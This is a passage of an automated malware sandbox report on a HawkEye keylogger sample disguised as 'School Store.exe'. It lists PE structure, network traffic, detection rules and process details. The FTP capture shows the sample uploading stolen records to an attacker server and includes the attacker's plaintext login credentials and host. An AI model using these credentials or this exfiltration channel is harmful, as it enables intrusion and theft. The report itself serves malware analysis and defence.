                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x13bb2c0x4f.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x13c0000x5c6.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x13e0000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000x139b840x139c00False0.581927757719data6.35046946452IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x13c0000x5c60x600False0.419270833333data4.10690969353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x13e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_VERSION0x13c0a00x33cdata
                                                                                                  RT_MANIFEST0x13c3dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Version Infos

                                                                                                  DescriptionData
                                                                                                  Translation0x0000 0x04b0
                                                                                                  LegalCopyrightCopyright 2014
                                                                                                  Assembly Version1.0.0.0
                                                                                                  InternalNameSchool Store.exe
                                                                                                  FileVersion1.0.0.0
                                                                                                  CompanyName
                                                                                                  LegalTrademarks
                                                                                                  Comments
                                                                                                  ProductNameSchool Store
                                                                                                  ProductVersion1.0.0.0
                                                                                                  FileDescriptionSchool Store
                                                                                                  OriginalFilenameSchool Store.exe

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  07/27/21-11:13:57.548141TCP2020410ET TROJAN HawkEye Keylogger FTP4975921192.168.2.645.141.152.18

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jul 27, 2021 11:12:38.004704952 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.035362005 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.035525084 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.120166063 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.152570963 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.156857014 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.156893015 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.156913042 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.156929970 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.156981945 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.157016993 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.162892103 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.193281889 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.255975008 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.275943995 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.311923027 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.364185095 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.364217997 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.364242077 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.364264965 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.364276886 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.364290953 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.364321947 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.366306067 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.366338015 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.366378069 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.369270086 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.369317055 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.369393110 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.370640993 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.370682001 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.370968103 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.372703075 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.372740030 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.372997999 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.374768972 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.374871969 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.375108004 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.393016100 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.393059969 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.393167973 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.394041061 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.394082069 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.396200895 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.396239996 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.397165060 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.397195101 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.398283958 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.398318052 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.398374081 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.401366949 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.401405096 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.401465893 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.402595043 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.402637005 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.402661085 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.404695988 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.404733896 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.404792070 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.406888008 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.406929016 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.406982899 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.409008980 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.409041882 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.409085035 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.410937071 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.410981894 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.411027908 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.413002014 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.413044930 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.413091898 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.415323019 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.415364027 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.415436029 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:38.416969061 CEST44349723142.250.185.196192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.417072058 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:12:41.955709934 CEST49723443192.168.2.6142.250.185.196
                                                                                                  Jul 27, 2021 11:13:57.354295015 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.371767998 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.371943951 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.391149998 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.392607927 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.409681082 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.409714937 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.411021948 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.448457956 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.448874950 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.468286037 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.469412088 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.490956068 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.491383076 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.511980057 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.512717009 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.529757023 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.530658960 CEST4976062998192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.547650099 CEST629984976045.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.547832012 CEST4976062998192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.548141003 CEST4975921192.168.2.645.141.152.18
                                                                                                  Jul 27, 2021 11:13:57.565314054 CEST214975945.141.152.18192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.566169977 CEST4976062998192.168.2.645.141.152.18

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jul 27, 2021 11:12:26.811398983 CEST5838453192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:26.847327948 CEST53583848.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:28.179333925 CEST6026153192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:28.216945887 CEST53602618.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:29.609999895 CEST5606153192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:29.637172937 CEST53560618.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:31.046468019 CEST5833653192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:31.074786901 CEST53583368.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:32.333125114 CEST5378153192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:32.371471882 CEST53537818.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:33.807626963 CEST5406453192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:33.835478067 CEST53540648.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:37.748260021 CEST5281153192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:37.778223038 CEST53528118.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:37.949403048 CEST5529953192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:37.983450890 CEST53552998.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.387200117 CEST6374553192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:38.420815945 CEST53637458.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.427440882 CEST5005553192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:38.467489004 CEST53500558.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:38.516799927 CEST6137453192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:38.544190884 CEST53613748.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:42.191471100 CEST5033953192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:42.219085932 CEST53503398.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:43.345118046 CEST6330753192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:43.370163918 CEST53633078.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:44.052190065 CEST4969453192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:44.089912891 CEST53496948.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:45.141823053 CEST5498253192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:45.168000937 CEST53549828.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:52.581732988 CEST5001053192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:52.618264914 CEST53500108.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:53.325315952 CEST6371853192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:53.354928970 CEST53637188.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:54.279099941 CEST6211653192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:54.307617903 CEST53621168.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:55.026343107 CEST6381653192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:55.054486990 CEST53638168.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:55.685601950 CEST5501453192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:55.713165045 CEST53550148.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:12:56.341555119 CEST6220853192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:12:56.377067089 CEST53622088.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:01.275891066 CEST5757453192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:01.317720890 CEST53575748.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:20.977112055 CEST5181853192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:21.015315056 CEST53518188.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:21.588793993 CEST5662853192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:21.595165014 CEST6077853192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:21.625858068 CEST53566288.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:21.630134106 CEST53607788.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:22.340476036 CEST5379953192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:22.387789965 CEST53537998.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:22.504103899 CEST5468353192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:22.555233002 CEST53546838.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:22.717168093 CEST5932953192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:22.751437902 CEST53593298.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:23.209939957 CEST6402153192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:23.248761892 CEST53640218.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:23.674868107 CEST5612953192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:23.708580017 CEST53561298.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:24.213399887 CEST5817753192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:24.249105930 CEST53581778.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:25.044179916 CEST5070053192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:25.079263926 CEST53507008.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:26.454029083 CEST5406953192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:26.493941069 CEST53540698.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:26.940085888 CEST6117853192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:26.976125956 CEST53611788.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:35.773598909 CEST5701753192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:35.812918901 CEST53570178.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:37.908514977 CEST5632753192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:37.945442915 CEST53563278.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:39.891526937 CEST5024353192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:39.927301884 CEST53502438.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:43.174030066 CEST6205553192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:43.212934971 CEST53620558.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:13:57.284341097 CEST6124953192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:13:57.328638077 CEST53612498.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:14:04.985260010 CEST6525253192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:14:05.025580883 CEST53652528.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:14:11.354195118 CEST6436753192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:14:11.389573097 CEST53643678.8.8.8192.168.2.6
                                                                                                  Jul 27, 2021 11:14:13.215167999 CEST5506653192.168.2.68.8.8.8
                                                                                                  Jul 27, 2021 11:14:13.250876904 CEST53550668.8.8.8192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Jul 27, 2021 11:12:37.949403048 CEST192.168.2.68.8.8.80xc470Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                                  Jul 27, 2021 11:13:43.174030066 CEST192.168.2.68.8.8.80xadd5Standard query (0)146.215.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                  Jul 27, 2021 11:13:57.284341097 CEST192.168.2.68.8.8.80xdc03Standard query (0)ftp.vngpack.comA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Jul 27, 2021 11:12:37.983450890 CEST8.8.8.8192.168.2.60xc470No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                                                                  Jul 27, 2021 11:13:43.212934971 CEST8.8.8.8192.168.2.60xadd5Name error (3)146.215.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                  Jul 27, 2021 11:13:57.328638077 CEST8.8.8.8192.168.2.60xdc03No error (0)ftp.vngpack.com45.141.152.18A (IP address)IN (0x0001)

                                                                                                  HTTPS Packets

                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                  Jul 27, 2021 11:12:38.156929970 CEST142.250.185.196443192.168.2.649723CN=www.google.com CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEMon Jun 28 06:12:58 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Mon Sep 20 06:12:57 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                  CN=GTS CA 1C3, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                                                                  CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028

                                                                                                  FTP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                  Jul 27, 2021 11:13:57.391149998 CEST214975945.141.152.18192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.
                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21.
                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21.220-This is a private system - No anonymous login
                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 8 of 50 allowed.220-Local time is now 05:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                  Jul 27, 2021 11:13:57.392607927 CEST4975921192.168.2.645.141.152.18USER newloggsaa@vngpack.com
                                                                                                  Jul 27, 2021 11:13:57.409714937 CEST214975945.141.152.18192.168.2.6331 User newloggsaa@vngpack.com OK. Password required
                                                                                                  Jul 27, 2021 11:13:57.411021948 CEST4975921192.168.2.645.141.152.18PASS Xpen2000
                                                                                                  Jul 27, 2021 11:13:57.448457956 CEST214975945.141.152.18192.168.2.6230 OK. Current restricted directory is /
                                                                                                  Jul 27, 2021 11:13:57.468286037 CEST214975945.141.152.18192.168.2.6504 Unknown command
                                                                                                  Jul 27, 2021 11:13:57.469412088 CEST4975921192.168.2.645.141.152.18PWD
                                                                                                  Jul 27, 2021 11:13:57.490956068 CEST214975945.141.152.18192.168.2.6257 "/" is your current location
                                                                                                  Jul 27, 2021 11:13:57.491383076 CEST4975921192.168.2.645.141.152.18TYPE I
                                                                                                  Jul 27, 2021 11:13:57.511980057 CEST214975945.141.152.18192.168.2.6200 TYPE is now 8-bit binary
                                                                                                  Jul 27, 2021 11:13:57.512717009 CEST4975921192.168.2.645.141.152.18PASV
                                                                                                  Jul 27, 2021 11:13:57.529757023 CEST214975945.141.152.18192.168.2.6227 Entering Passive Mode (45,141,152,18,246,22)
                                                                                                  Jul 27, 2021 11:13:57.548141003 CEST4975921192.168.2.645.141.152.18STOR HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
                                                                                                  Jul 27, 2021 11:13:57.565314054 CEST214975945.141.152.18192.168.2.6150 Accepted data connection
                                                                                                  Jul 27, 2021 11:13:57.589210987 CEST214975945.141.152.18192.168.2.6226-File successfully transferred
                                                                                                  226-File successfully transferred226 0.024 seconds (measured here), 62.73 Kbytes per second

                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: ypBoHI5G3x.exe PID: 6504 Parent PID: 6124

                                                                                                  General

                                                                                                  Start time:11:12:34
                                                                                                  Start date:27/07/2021
                                                                                                  Path:C:\Users\user\Desktop\ypBoHI5G3x.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:'C:\Users\user\Desktop\ypBoHI5G3x.exe'
                                                                                                  Imagebase:0xc30000
                                                                                                  File size:1287680 bytes
                                                                                                  MD5 hash:08D679D4B9A12137756CC9244BD6F017
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:low

                                                                                                  Analysis Process: InstallUtil.exe PID: 6456 Parent PID: 6504

                                                                                                  General

                                                                                                  Start time:11:13:26
                                                                                                  Start date:27/07/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  Imagebase:0x8b0000
                                                                                                  File size:41064 bytes
